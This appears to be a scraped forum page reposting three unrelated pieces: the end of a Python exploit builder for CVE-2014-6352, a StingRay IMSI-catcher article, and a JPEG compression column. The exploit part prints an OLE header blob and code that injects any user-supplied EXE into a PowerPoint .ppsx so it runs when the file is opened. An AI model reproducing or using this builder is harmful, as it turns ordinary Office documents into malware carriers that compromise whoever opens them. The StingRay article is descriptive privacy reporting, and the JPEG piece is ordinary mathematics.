"\x00\x00\x9F\x03\x00\x00\xA0\x03\x00\x00\xA1\x03\x00\x00\xA2\x03\x00\x00\xA3\x03\x00\x00\xA4\x03\x00\x00\xA5\x03\x00\x00\xA6\x03\x00\x00" "\xA7\x03\x00\x00\xA8\x03\x00\x00\xA9\x03\x00\x00\xAA\x03\x00\x00\xAB\x03\x00\x00\xAC\x03\x00\x00\xAD\x03\x00\x00\xAE\x03\x00\x00\xAF\x03" "\x00\x00\xB0\x03\x00\x00\xB1\x03\x00\x00\xB2\x03\x00\x00\xB3\x03\x00\x00\xB4\x03\x00\x00\xB5\x03\x00\x00\xB6\x03\x00\x00\xB7\x03\x00\x00" "\xB8\x03\x00\x00\xB9\x03\x00\x00\xBA\x03\x00\x00\xBB\x03\x00\x00\xBC\x03\x00\x00\xBD\x03\x00\x00\xBE\x03\x00\x00\xBF\x03\x00\x00\xC0\x03" "\x00\x00\xC1\x03\x00\x00\xC2\x03\x00\x00\xC3\x03\x00\x00\xC4\x03\x00\x00\xC5\x03\x00\x00\xC6\x03\x00\x00\xC7\x03\x00\x00\xC8\x03\x00\x00" "\xC9\x03\x00\x00\xCA\x03\x00\x00\xCB\x03\x00\x00\xCC\x03\x00\x00\xCD\x03\x00\x00\xCE\x03\x00\x00\xCF\x03\x00\x00\xD0\x03\x00\x00\xD1\x03" "\x00\x00\xFE\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF" "\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\xFF\x19\x91\x07\x00\x02\x00\x70\x75\x74\x74\x79\x2E\x65\x78" "\x65\x00\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x48\x43\x4C\x5C\x44\x65\x73\x6B\x74\x6F\x70\x5C\x50\x4F\x43\x5C\x70\x75\x74\x74\x79\x2E\x65" "\x78\x65\x00\x00\x00\x03\x00\x2A\x00\x00\x00\x43\x3A\x5C\x55\x73\x65\x72\x73\x5C\x48\x43\x4C\x5C\x41\x70\x70\x44\x61\x74\x61\x5C\x4C\x6F" "\x63\x61\x6C\x5C\x54\x65\x6D\x70\x5C\x70\x75\x74\x74\x79\x2E\x65\x78\x65\x00\x00\x90\x07\x00" ) if len(sys.argv) != 2: print ("[+] Usage: "+ sys.argv[0] + " [exe file] (EXE file should be less than 400KB)") exit(0) file = sys.argv[1] f = open(file,mode='rb') buff=f.read() f.close() evilbuff = bytearray((oleole + buff)) evilbuff += "\x00" * 20000 file = "temp\ppt\embeddings\oleObject1.bin" f = open(file,mode='wb') f.write(evilbuff) print ("[+] Injected exe into OLE") shutil.make_archive("exploit", "zip", "temp") print ("[+] packing exploit ppsx") shutil.move('exploit.zip', 'CVE-2014-6352.ppsx') print ("[+] Done") Sursa: MS Office 2007 and 2010 - OLE Arbitrary Command Execution
-
StingRay Technology: How Government Tracks Cellular Devices StingRay Technology StingRay is an IMSI-catcher (International Mobile Subscriber Identity) designed and commercialized by the Harris Corporation. The cellular-surveillance system costs as much as $400,000 in the basic configuration, and its price varies with add-ons ordered by the agency. The IMSI-catcher is a surveillance solution used by military and intelligence agencies for telephone eavesdropping. It allows for intercepting mobile phone traffic and tracking movements of mobile phone users. Essentially, an IMSI catcher operates as a bogus mobile cell tower that sits between the target mobile phone and the service provider’s real towers. The IMSI catcher runs a Man In the Middle (MITM) attack that could not be detected by the users without using specific products that secure communication on mobile devices. The use of the IMSI-catcher is raising a heated debate in the United States because devices like StingRay and other similar cellphone tracking solutions are being widely adopted by law enforcement agencies across the country. Due to the popularity of StingRay, the name is used improperly to reference several types of cellphone-surveillance solutions. StingRay allows law enforcement to intercept calls and Internet traffic, send fake texts, inject malware on a mobile device, and to locate the targets. Privacy advocates are concerned with possible abuses of such invasive technology. They speculate that there is the concrete risk that cyber criminals and foreign state-sponsored hackers could use it to track US citizens. StingRay-like solutions, also known as cell site simulators, trick cellphones into revealing different data, including users’ locations and identifying information. Law enforcement and intelligence agencies can target a specific individual analyzing incoming and outgoing calls and drawing on his social network. The principal problem in the adoption of the StingRay cellphone-surveillance technology is that, different from other solutions, it targets all nearby cellular devices, allowing an attacker to get information from hundreds of devices concurrently. Figure 1 – StingRay As explained by Nathan Freed Wessler, an attorney with the ACLU’s Speech, Privacy & Technology Project, StingRay equipment sends intrusive electronic signals in the immediate vicinity, sinking private buildings and siphoning data about the locations and identities of cellphones inside. The Federal Communications Commission (FCC) recently created an internal task force to study the misuse of IMSI catchers in the cybercrime ecosystem and foreign intelligence agencies, which demonstrated that this technology could be used to spy on American citizens, businesses and diplomats. How does StingRay work? StingrRay equipment could operate in both active and passive modes. In the first case, the device simulates the behavior of a wireless carrier cell tower. In the second case, it actively interferes with cellular devices performing operations like data exfiltration. The StingRay system is typically installed in a vehicle in a way that agents can move it into any neighborhood. It tricks all nearby cellular devices into connecting to it and allowing data access by law enforcement. Let us see in detail the two operative modes implemented by the StingRay technology. The Passive mode A StingRay that is operating in passive mode is able to receive and analyze signals being transmitted by mobile devices and wireless carrier cell stations. The term “passive” indicates that the equipment doesn’t communicate directly with cellular devices and does not simulate a wireless carrier cell site. The activity of base station surveys allows extracting information on cell sites that includes identification numbers, signal strength, and signal coverage areas. StingRay operates as a mobile phone and collects signals sent by cell stations near the equipment. The Active mode StingRay equipment operating in “active mode” will force each cellular device in a predetermined area to disconnect from its legitimate service provider cell site and establish a new connection with the attacker’s StingRay system. StingRay broadcasts a pilot signal that is stronger than the signals sent by legitimate cell sites operating in the same area, forcing connections from the cellular device in the area covered by the equipment. The principal operations made by the StingRay are: Data Extraction from cellular devices – StingRay collects information that identifies a cellular device (i.e. IMSI, ESN) directly from it by using radio waves. Run Man In The Middle attacks to eavesdrop on Communications Content Writing metadata to the cellular device Denial of Service, preventing the cellular device user from placing a call or accessing data services. Forcing an increase in signal transmission power Forcing an abundance of signal transmissions Tracking and locating Figure 2 – StingRay case study USA – StingRay is a prerogative of intelligence agencies Surveillance of cell phones is a common practice in intelligence agencies. Agents have used devices like StingRay for a long time, and the use has extended to local law enforcement in the USA. Dozens of local law enforcement and police agencies are collecting information about thousands of cell phone devices at a time by using advanced technology, according to public records obtained by various media agencies in the country. USA Today reported that records from more than 125 police agencies in 33 states reveal that nearly 25 percent of law-enforcement agencies have used “tower dump,” and at least 25 police departments have purchased StingRay equipment. Many police agencies have denied public records requests, arguing that criminals or terrorists could benefit from the disclosure of information and avoid surveillance methods adopted locally by law enforcement. Security experts and privacy advocates raise the discussion regarding the use of StingRay technology and the way the law enforcement agencies manage/share citizens’ data. The militarization of America’s local police agencies is a phenomenon attracting the attention of the media as never before, probably also as a consequence of the debate on privacy and surveillance triggered by the Snowden’s revelations. The phenomena are not limited to the US. Recent documents released by the City of Oakland reveal that the local Police Department, the nearby Fremont Police Department, and the Alameda County District Attorney jointly requested an upgrade for their cellular surveillance equipment. The specific update to StingRay is known as Hailstorm, and is necessary to allow the equipment to track also cellular devices of new generation. According to the Ars web portal, the upgrade will cost $460,000, including $205,000 in total Homeland Security grant money and $50,000 from the Oakland Police Department. Cellular tracking technology like StingRay is still considered a privileged solution to track cellular devices and siphon their data. The interest of local law enforcement in the surveillance solutions is increasing and the decision to update their configuration led privacy experts to believe that their diffusion will continue to increase. A look at the technologies that track cellular devices To better understand the StingRay technology, let us familiarize ourselves with the names of the principal surveillance solutions available on the market. Triggerfish Triggerfish is an eavesdropping equipment that allows law enforcement to intercept cellular conversations in real time. Its use extends the basic capabilities of StingRay, which are more oriented to device location monitoring and gathering metadata. Triggerfish allows authorities to monitor up to 60,000 different phones at one time over the targeted area. Figure 3 – Triggerfish According a post published by the journalist Ryan Gallagher on Ars, its cost ranges between $90,000 and $102,000. Kingfish Kingfish is a surveillance transceiver that is used by law enforcement and intelligence agencies to track cellular devices and exfiltrate information from mobile devices over a targeted area. It could be concealed in a briefcase and allows gathering of unique identity codes and shows connections between phones and numbers being dialed. Its cost is slightly higher than $25,000. Figure 4 – Kingfish Amberjack Amberjack is an important accessory for the surveillance systems like StingRay, Gossamer, and Kingfish. It is a direction-finding system antenna that is used for cellular device tracking. It costs nearly $35,015. Harpoon Harpoon is an “amplifier” (PDF) that can work in conjunction with both Stingray and Kingfish devices to track targets from a greater distance. Its cost ranges between $16,000 and $19,000. Figure 5 – Harpoon Hailstorm Hailstorm is a surveillance device that could be purchased as a standalone unit or as an upgrade to the Stingray or Kingfish. The system allows the tracking of cellular devices even if they are based on modern technology. “Procurement documents (PDF) show that Harris Corp. has, in at least one case, recommended that authorities use the Hailstorm in conjunction with software made by Nebraska-based surveillance company Pen-Link. The Pen-Link software appears to enable authorities deploying the Hailstorm to directly communicate with cell phone carriers over an Internet connection, possibly to help coordinate the surveillance of targeted individuals,” states an Ars blog post. The cost of Hailstorm is $169,602 if it is sold as a standalone unit, and it could be cheaper if acquired as an upgrade. Gossamer Gossamer is a portable unit that is used to access data on cellular devices operating in a target area. Gossamer provides similar functionality of StingRay with the advantage of being a hand-held model. Gossamer also lets law enforcement run a DoS attack on a target, blocking it from making or receiving calls, as explained in the marketing materials (PDF) published by a Brazilian reseller of the Harris equipment. Gossamer is sold for $19,696. Figure 6 – The Gossamer The Case: Metropolitan Police Department (MPD) uses StingRay StingRay has been used for a long time by the police. In 2003, the Metropolitan Police Department (MPD) in Washington, DC was awarded a $260,000 grant from the Department of Homeland Security (DHS) to acquire StingRay. The purchase was officially motivated by the need to increase capabilities in the investigation of possible terroristic events. Unfortunately, the device was not used by law enforcement for five years due to the lack of funds to pay for training for its use. In 2008, the Metropolitan Police Department decided to again adopt StingRay for its investigations, and received funds to upgrade it. The VICE News has documented numerous purchases made by the DC police department and related to the solution of services offered by the Harris Corporation. The problem is that according to government officials the systems weren’t used to prevent the terrorism act, but law enforcement is using it in routine investigations involving ordinary crime. There is no documentation regarding the use of StingRay made by the agents of the department. In a memo dated December 2008, DC chief of police and other top department officials by the commander of the Narcotics and Special Investigations Division explained how the department intended to use StingRay. “If DC police are driving around with a Stingray device, they’re likely capturing information about the locations and movements of members of Congress, cabinet members, foreign dignitaries, and all of the other people who congregate in the District. “The [redacted] will be used by MPD to track cellular phones possessed by criminal offenders and/or suspected terrorists by using wireless technology to triangulate the location of the phone,” “The ability to [redacted] in the possession of criminals will allow MPD to track their exact movements, as well as pinpoint their current locations for rapid apprehension,” states the document. “The procurement of this equipment will increase the number of MPD arrests for fugitives, drug traffickers, and violent offenders (robbery, assault with a deadly weapon, Homicide), while reducing the time it takes to locate dangerous offenders that need to be removed from the streets of DC.” The memo confirms that the department has used the StingRay for many purposes other than counter terrorism activities. Many organizations are condemning the use of such technology because it represents a serious threat to the privacy of the citizens. When an agency uses StingRay to track a specific individual, it is very likely that the system will also catch many other devices of innocent and unaware people. “When it’s used to track a suspect’s cell phone, [it] also gather information about the phones of countless bystanders who happen to be nearby,” explains the representatives at the American Civil Liberties Union (ACLU). StingRay is also a privileged instrument to collect information about ongoing communications, including phone numbers of interlocutors. It is important to understand that its use opens the door to a “sort of invasive surveillance”. The principal problem related to the use of Stingrays and similar solutions is related to their application context. This category of equipment, in fact, was mainly designed to support intelligence activities, but today its use has been extended to local law enforcement, as explained by Nathan Wessler: “Initially the domain of the National Security Agency (NSA) and other intelligence agencies,” the use of the tracking device has now “trickled down to federal, state, and local law enforcement.” The extensive use of StingRay is a violation of the Fourth Amendment; it is threatening the rights of tens of thousands of DC residents. The ACLU has identified 44 law enforcement agencies in 18 states in the US that use StingRay equipment for their investigation, but as explained by Wessler it must be considered that the use of such devices in the vicinity of government offices is a circumstance of great concern. That’s why he mentioned the case of the capital Washington. “An inherent attribute of how this technology functions is that it sweeps in information about large numbers of innocent bystanders even when police are trying to track the location of a particular suspect. If the MPD is driving around DC with Stingray devices, it is likely capturing information about the locations and movements of members of Congress, cabinet members, federal law enforcement agents, and Homeland Security personnel, consular staff, and foreign dignitaries, and all of the other people who congregate in the District…. If cell phone calls of congressional staff, White House aides, or even members of Congress are being disconnected, dropped, or blocked by MPD Stingrays, that’s a particularly sensitive and troublesome problem,” said Wessler during an interview with VICE News. The documents obtained by the website Muckrock from the FBI revealed that law enforcement agencies are required to sign a non-disclosure agreement with the Bureau before they can start using StingRays for their investigation. The ACLU obtained emails that explain that the vendor Harris Corporation misled the FCC for approval of Stingray by supposing its adoption for “emergency situations.” In reality, the equipment is used by law enforcement for any kind of investigation. The following map reports the use of the StingRay tracking system by state and local police departments. According to the ACLU, 46 agencies in 18 states and the District of Columbia own StingRays. According to privacy experts, the data underestimates the real diffusion in the use of the StingRay system because of lack of official documentation that would report the number of investigations in which the equipment has been used. Figure 7 – StingRay diffusion in the USA Conclusion StingRay technology raises serious privacy concerns because of the indiscriminate way it targets cellular devices in a specific area. The dragnet way in which StingRay operates appears to be in contrast with the principle of various laws worldwide. Government and law enforcement shouldn’t be able to access citizen’s private information without proving to a court order that must be issued to support investigation activities. In the US, for example, the Fourth Amendment stands for the basic principle that the US government cannot conduct a massive surveillance operation, also indicated as “general searches”. The Supreme Court recently reiterated that principle in a case involving cell phone surveillance, and confirmed that law enforcement need a warrant to analyze data on the suspect’s cellphone. Organizations for the defense of civil liberties ask governments to provide warrants to use surveillance technologies like StingRay. The warrant still represents a reasonable mechanism for ensuring the right balance between the citizen’s privacy and law enforcement needs. Organizations such as the American Civil Liberties Union and Electronic Privacy Information Center (EPIC) highlighted the risks related to the indiscriminate collection of a so large amount of cellular data. “I don’t think that these devices should never be used, but at the same time, you should clearly be getting a warrant,” said Alan Butler of EPIC. Unfortunately, cases such as the one disclosed in this post suggest that governments are using StingRay equipment in secrecy. In some cases, a court order is issued for specific activities, but law enforcement arbitrarily extends the use of technology in other contexts that may be menacing to citizens’ privacy. References https://news.vice.com/article/police-in-washington-dc-are-using-the-secretive-stingray-cell-phone-tracking-tool Surveillance - How to secretly track cellphone users position | Security Affairs https://www.aclu.org/blog/national-security-technology-and-liberty/trickle-down-surveillance https://www.aclu.org/maps/stingray-tracking-devices-whos-got-them Cellphone spying gear, law enforcement has it, and it wants you to forget about it https://www.scribd.com/doc/238334715/Stingray-Phone-Tracker LYE: Short-circuiting 'stingray' surveillance of cellphones - Washington Times Cellphone data spying: It's not just the NSA https://www.aclu.org/files/assets/rigmaiden_-_doj_stingray_emails_declaration.pdf Meet the machines that steal your phone’s data | Ars Technica http://cdn.arstechnica.net/wp-content/uploads/2013/09/amberjack.pdf Request 2595 http://cdn.arstechnica.net/wp-content/uploads/2013/09/oakland-penlink-hailstorm.pdf By Pierluigi Paganini|November 10th, 2014|General Security|0 Comments Sursa: StingRay Technology: How Government Tracks Cellular Devices - InfoSec Institute
-
Image Compression: Seeing What's Not There In this article, we'll study the JPEG baseline compression algorithm... David Austin Grand Valley State University david at merganser.math.gvsu.edu [TABLE=align: right] [TR] [TD][/TD] [TD][/TD] [/TR] [/TABLE] The HTML file that contains all the text for this article is about 25,000 bytes. That's less than one of the image files that was also downloaded when you selected this page. Since image files typically are larger than text files and since web pages often contain many images that are transmitted across connections that can be slow, it's helpful to have a way to represent images in a compact format. In this article, we'll see how a JPEG file represents an image using a fraction of the computer storage that might be expected. We'll also look at some of the mathematics behind the newer JPEG 2000 standard. This topic, more widely known as data compression, asks the question, "How can we represent information in a compact, efficient way?" Besides image files, it is routine to compress data, video, and music files. For instance, compression enables your 8 gigabyte iPod Nano to hold about 2000 songs. As we'll see, the key is to organize the information in some way that reveals an inherent redundancy that can be eliminated. In this article, we'll study the JPEG baseline compression algorithm using the image on the right as an example. (JPEG is an acronym for "Joint Photographic Experts Group.") Some compression algorithms are lossless for they preserve all the original information. Others, such as the JPEG baseline algorithm, are lossy--some of the information is lost, but only information that is judged to be insignificant. Before we begin, let's naively determine how much computer storage should be required for this image. First, the image is arranged in a rectangular grid of pixels whose dimensions are 250 by 375 giving a total of 93,750 pixels. The color of each pixel is determined by specifying how much of the colors red, green and blue should be mixed together. Each color component is represented as an integer between 0 and 255 and so requires one byte of computer storage. Therefore, each pixel requires three bytes of storage implying that the entire image should require 93,750 3 = 281,250 bytes. However, the JPEG image shown here is only 32,414 bytes. In other words, the image has been compressed by a factor of roughly nine. We will describe how the image can be represented in such a small file (compressed) and how it may be reconstructed (decompressed) from this file. The JPEG compression algorithm First, the image is divided into 8 by 8 blocks of pixels. Since each block is processed without reference to the others, we'll concentrate on a single block. In particular, we'll focus on the block highlighted below. Here is the same block blown up so that the individual pixels are more apparent. Notice that there is not tremendous variation over the 8 by 8 block (though other blocks may have more). Remember that the goal of data compression is to represent the data in a way that reveals some redundancy. We may think of the color of each pixel as represented by a three-dimensional vector (R,G, consisting of its red, green, and blue components. In a typical image, there is a significant amount of correlation between these components. For this reason, we will use a color space transform to produce a new vector whose components represent luminance, Y, and blue and red chrominance, Cb and Cr. The luminance describes the brightness of the pixel while the chrominance carries information about its hue. These three quantities are typically less correlated than the (R, G, B) components. Furthermore, psychovisual experiments demonstrate that the human eye is more sensitive to luminance than chrominance, which means that we may neglect larger changes in the chrominance without affecting our perception of the image. Since this transformation is invertible, we will be able to recover the (R,G, vector from the (Y, Cb, Cr) vector. This is important when we wish to reconstruct the image. (To be precise, we usually add 128 to the chrominance components so that they are represented as numbers between 0 and 255.) When we apply this transformation to each pixel in our block we obtain three new blocks, one corresponding to each component. These are shown below where brighter pixels correspond to larger values. [TABLE] [TR] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] Y[/TD] [TD=align: center] Cb[/TD] [TD=align: center] Cr[/TD] [/TR] [/TABLE] As is typical, the luminance shows more variation than the the chrominance. For this reason, greater compression ratios are sometimes achieved by assuming the chrominance values are constant on 2 by 2 blocks, thereby recording fewer of these values. For instance, the image editing software Gimp provides the following menu when saving an image as a JPEG file: The "Subsampling" option allows the choice of various ways of subsampling the chrominance values. Also of note here is the "Quality" parameter, whose importance will become clear soon. The Discrete Cosine Transform Now we come to the heart of the compression algorithm. Our expectation is that, over an 8 by 8 block, the changes in the components of the (Y, Cb, Cr) vector are rather mild, as demonstrated by the example above. Instead of recording the individual values of the components, we could record, say, the average values and how much each pixel differs from this average value. In many cases, we would expect the differences from the average to be rather small and hence safely ignored. This is the essence of the Discrete Cosine Transform (DCT), which will now be explained. We will first focus on one of the three components in one row in our block and imagine that the eight values are represented by f0, f1, ..., f7. We would like to represent these values in a way so that the variations become more apparent. For this reason, we will think of the values as given by a function fx, where x runs from 0 to 7, and write this function as a linear combination of cosine functions: Don't worry about the factor of 1/2 in front or the constants Cw (Cw = 1 for all w except C0 = ). What is important in this expression is that the function fx is being represented as a linear combination of cosine functions of varying frequencies with coefficients Fw. Shown below are the graphs of four of the cosine functions with corresponding frequencies w. [TABLE] [TR] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] w = 0[/TD] [TD=align: center] w = 1[/TD] [/TR] [TR] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] w = 2[/TD] [TD=align: center] w = 3[/TD] [/TR] [/TABLE] Of course, the cosine functions with higher frequencies demonstrate more rapid variations. Therefore, if the values fx change relatively slowly, the coefficients Fw for larger frequencies should be relatively small. We could therefore choose not to record those coefficients in an effort to reduce the file size of our image. The DCT coefficients may be found using Notice that this implies that the DCT is invertible. For instance, we will begin with fx and record the values Fw. When we wish to reconstruct the image, however, we will have the coefficients Fw and recompute the fx. Rather than applying the DCT to only the rows of our blocks, we will exploit the two-dimensional nature of our image. The Discrete Cosine Transform is first applied to the rows of our block. If the image does not change too rapidly in the vertical direction, then the coefficients shouldn't either. For this reason, we may fix a value of w and apply the Discrete Cosine Transform to the collection of eight values of Fw we get from the eight rows. This results in coefficients Fw,u where w is the horizontal frequency and u represents a vertical frequency. We store these coefficients in another 8 by 8 block as shown: Notice that when we move down or to the right, we encounter coefficients corresponding to higher frequencies, which we expect to be less significant. The DCT coefficients may be efficiently computed through a Fast Discrete Cosine Transform, in the same spirit that the Fast Fourier Transform efficiently computes the Discrete Fourier Transform. Quantization Of course, the coefficients Fw,u, are real numbers, which will be stored as integers. This means that we will need to round the coefficients; as we'll see, we do this in a way that facilitates greater compression. Rather than simply rounding the coefficients Fw,u, we will first divide by a quantizing factor and then record round(Fw,u / Qw,u) This allows us to emphasize certain frequencies over others. More specifically, the human eye is not particularly sensitive to rapid variations in the image. This means we may deemphasize the higher frequencies, without significantly affecting the visual quality of the image, by choosing a larger quantizing factor for higher frequencies. Remember also that, when a JPEG file is created, the algorithm asks for a parameter to control the quality of the image and how much the image is compressed. This parameter, which we'll call q, is an integer from 1 to 100. You should think of q as being a measure of the quality of the image: higher values of q correspond to higher quality images and larger file sizes. From q, a quantity is created using Here is a graph of as a function of q: Notice that higher values of q give lower values of . We then round the weights as round(Fw,u / Qw,u) Naturally, information will be lost through this rounding process. When either or Qw,u is increased (remember that large values of correspond to smaller values of the quality parameter q), more information is lost, and the file size decreases. Here are typical values for Qw,u recommended by the JPEG standard. First, for the luminance coefficients: and for the chrominance coefficients: These values are chosen to emphasize the lower frequencies. Let's see how this works in our example. Remember that we have the following blocks of values: [TABLE] [TR] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] Y[/TD] [TD=align: center] Cb[/TD] [TD=align: center] Cr[/TD] [/TR] [/TABLE] Quantizing with q = 50 gives the following blocks: [TABLE] [TR] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] Y[/TD] [TD=align: center] Cb[/TD] [TD=align: center] Cr[/TD] [/TR] [/TABLE] The entry in the upper left corner essentially represents the average over the block. Moving to the right increases the horizontal frequency while moving down increases the vertical frequency. What is important here is that there are lots of zeroes. We now order the coefficients as shown below so that the lower frequencies appear first. In particular, for the luminance coefficients we record 20 -7 1 -1 0 -1 1 0 0 0 0 0 0 0 -2 1 1 0 0 0 0 ... 0 Instead of recording all the zeroes, we can simply say how many appear (notice that there are even more zeroes in the chrominance weights). In this way, the sequences of DCT coefficients are greatly shortened, which is the goal of the compression algorithm. In fact, the JPEG algorithm uses extremely efficient means to encode sequences like this. When we reconstruct the DCT coefficients, we find [TABLE] [TR] [TD] Original[/TD] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD] Reconstructed[/TD] [TD] [/TD] [TD] [/TD] [TD] [/TD] [/TR] [TR] [TD][/TD] [TD=align: center] Y[/TD] [TD=align: center] Cb[/TD] [TD=align: center] Cr[/TD] [/TR] [/TABLE] Reconstructing the image from the information is rather straightforward. The quantization matrices are stored in the file so that approximate values of the DCT coefficients may be recomputed. From here, the (Y, Cb, Cr) vector is found through the Inverse Discrete Cosine Transform. Then the (R, G, B) vector is recovered by inverting the color space transform. Here is the reconstruction of the 8 by 8 block with the parameter q set to 50 [TABLE=align: center] [TR] [TD][/TD] [TD] [/TD] [/TR] [TR] [TD=align: center] Original[/TD] [TD=align: center] Reconstructed (q = 50)[/TD] [/TR] [/TABLE] and, below, with the quality parameter q set to 10. As expected, the higher value of the parameter q gives a higher quality image. [TABLE=align: center] [TR] [TD][/TD] [TD][/TD] [/TR] [TR] [TD=align: center] Original[/TD] [TD=align: center] Reconstructed (q = 10)[/TD] [/TR] [/TABLE] JPEG 2000 While the JPEG compression algorithm has been quite successful, several factors created the need for a new algorithm, two of which we will now describe. First, the JPEG algorithm's use of the DCT leads to discontinuities at the boundaries of the 8 by 8 blocks. For instance, the color of a pixel on the edge of a block can be influenced by that of a pixel anywhere in the block, but not by an adjacent pixel in another block. This leads to blocking artifacts demonstrated by the version of our image created with the quality parameter q set to 5 (by the way, the size of this image file is only 1702 bytes) and explains why JPEG is not an ideal format for storing line art. In addition, the JPEG algorithm allows us to recover the image at only one resolution. In some instances, it is desirable to also recover the image at lower resolutions, allowing, for instance, the image to be displayed at progressively higher resolutions while the full image is being downloaded. To address these demands, among others, the JPEG 2000 standard was introduced in December 2000. While there are several differences between the two algorithms, we'll concentrate on the fact that JPEG 2000 uses a wavelet transform in place of the DCT. Before we explain the wavelet transform used in JPEG 2000, we'll consider a simpler example of a wavelet transform. As before, we'll imagine that we are working with luminance-chrominance values for each pixel. The DCT worked by applying the transform to one row at a time, then transforming the columns. The wavelet transform will work in a similar way. To this end, we imagine that we have a sequence f0, f1, ..., fn describing the values of one of the three components in a row of pixels. As before, we wish to separate rapid changes in the sequence from slower changes. To this end, we create a sequence of wavelet coefficients: Notice that the even coefficients record the average of two successive values--we call this the low pass band since information about high frequency changes is lost--while the odd coefficients record the difference in two successive values--we call this the high pass band as high frequency information is passed on. The number of low pass coefficients is half the number of values in the original sequence (as is the number of high pass coefficients). It is important to note that we may recover the original f values from the wavelet coefficients, as we'll need to do when reconstructing the image: We reorder the wavelet coefficients by listing the low pass coefficients first followed by the high pass coefficients. Just as with the 2-dimensional DCT, we may now apply the same operation to transform the wavelet coefficients vertically. This results in a 2-dimensional grid of wavelet coefficients divided into four blocks by the low and high pass bands: As before, we use the fact that the human eye is less sensitive to rapid variations to deemphasize the rapid changes seen with the high pass coefficients through a quantization process analagous to that seen in the JPEG algorithm. Notice that the LL region is obtained by averaging the values in a 2 by 2 block and so represents a lower resolution version of the image. In practice, our image is broken into tiles, usually of size 64 by 64. The reason for choosing a power of 2 will be apparent soon. We'll demonstrate using our image with the tile indicated. (This tile is 128 by 128 so that it may be more easily seen on this page.) Notice that, if we transmit the coefficients in the LL region first, we could reconstruct the image at a lower resolution before all the coefficients had arrived, one of aims of the JPEG 2000 algorithm. We may now perform the same operation on the lower resolution image in the LL region thereby obtaining images of lower and lower resolution. The wavelet coefficients may be computed through a lifting process like this: The advantage is that the coefficients may be computed without using additional computer memory--a0 first replaces f0 and then a1 replaces f1. Also, in the wavelet transforms that are used in the JPEG 2000 algorithm, the lifting process enables faster computation of the coefficients. The JPEG 2000 wavelet transform The wavelet transform described above, though similar in spirit, is simpler than the ones proposed in the JPEG 2000 standard. For instance, it is desirable to average over more than two successive values to obtain greater continuity in the reconstructed image and thus avoid phenomena like blocking artifacts. One of the wavelet transforms used is the Le Gall (5,3) spline in which the low pass (even) and high pass (odd) coefficients are computed by As before, this transform is invertible, and there is a lifting scheme for performing it efficiently. Another wavelet transform included in the standard is the Cohen-Daubechies-Fauraue 9/7 biorthogonal transform, whose details are a little more complicated to describe though a simple lifting recipe exists to implement it. It is worthwhile to compare JPEG and JPEG 2000. Generally speaking, the two algorithms have similar compression ratios, though JPEG 2000 requires more computational effort to reconstruct the image. JPEG 2000 images do not show the blocking artifacts present in JPEG images at high compression ratios but rather become more blurred with increased compression. JPEG 2000 images are often judged by humans to be of a higher quality. At this time, JPEG 2000 is not widely supported by web browsers but is used in digital cameras and medical imagery. There is also a related standard, Motion JPEG 2000, used in the digital film industry. References Home pages for the JPEG committee and JPEG 2000 committee Tinku Archarya, Ping-Sing Tsai, JPEG2000 Standard for Image Compression: Concepts, Algorithms and VLSI Architectures, Wiley, Hoboken. 2005. Jin Li, Image Compression: The mathematics of JPEG 2000, Modern Signal Processing, Volume 46, 2003. Ingrid Daubechies, Ten lectures on wavelets, SIAM, Philadelphia. 1992. K.R. Rao, Patrick Yip, Discrete Cosine Transform: Algorithms, Advantages, Applications, Academic Press, San Diego. 1990. Wikipedia entries for JPEG and JPEG 2000. David Austin Grand Valley State University david at merganser.math.gvsu.edu Those who can access JSTOR can find some of the papers mentioned above there. For those with access, the American Mathematical Society's MathSciNet can be used to get additional bibliographic information and reviews of some these materials. Some of the items above can be accessed via the ACM Portal , which also provides bibliographic services. Sursa: Feature Column from the AMS
-
